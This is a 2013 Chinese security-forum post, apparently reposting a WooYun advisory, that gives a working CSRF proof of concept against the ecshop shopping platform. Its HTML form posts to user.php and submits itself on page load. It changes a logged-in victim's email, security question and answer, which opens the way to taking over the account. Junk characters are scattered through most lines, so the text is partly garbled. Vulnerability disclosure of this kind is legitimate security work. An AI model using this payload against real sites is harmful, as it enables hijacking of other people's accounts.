找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1906|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
简要描述:
4 ^; H6 G. x" yecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现- G' z$ R7 y3 \
5 S9 F! X% q$ y' f& l8 T
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
' N% a4 B7 S4 H$ }9 w5 k3 O8 N
3 Q5 u9 v/ s9 o: J3 M. P详细说明:. R: M# h4 P6 w  I: [# r/ U2 m
利用csrf和xss可以突破官方所说的“障碍”2 M- w& u" b1 _$ I/ D
xss版本已经有人说明0 E" {7 y( c2 l$ l+ E
这里给出csrf版本' T1 A  W7 b" x" g

$ f/ \% \- ]0 g& ^* S漏洞证明:
! [3 c0 w% ^. P5 |2 K; T<html>
! w- w, J; y& Y' g' U, [<body>3 z, \& _2 k. S: }) P
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">) X$ ^* v: B1 g* a6 M' T. \8 L
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
. ~* v4 u; ?5 j1 i3 @<INPUT TYPE="text" NAME="act" value="act_edit_profile">
/ R4 ]) t, e! N! }<INPUT TYPE="text" NAME="sel_question" value="ecshop">
3 M. W. K0 V2 v. L1 o5 \, ]) {0 z<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
% M8 \* O: X; {7 H9 D1 r</body>' _  _7 r% ^) B7 q( c9 U8 e+ u) n# Z
<script>1 D; k, h% n% |
document.forms[0].submit();' h$ j: Y/ _5 G* [9 d- ]7 U2 c) |
</script>+ B% j3 I1 A2 k2 \/ |1 z
</html>' H: t/ e% X) G* N
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失' L3 J! Y( t. ^6 C% J

5 G+ S: q6 @* E$ I: S0 B' h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表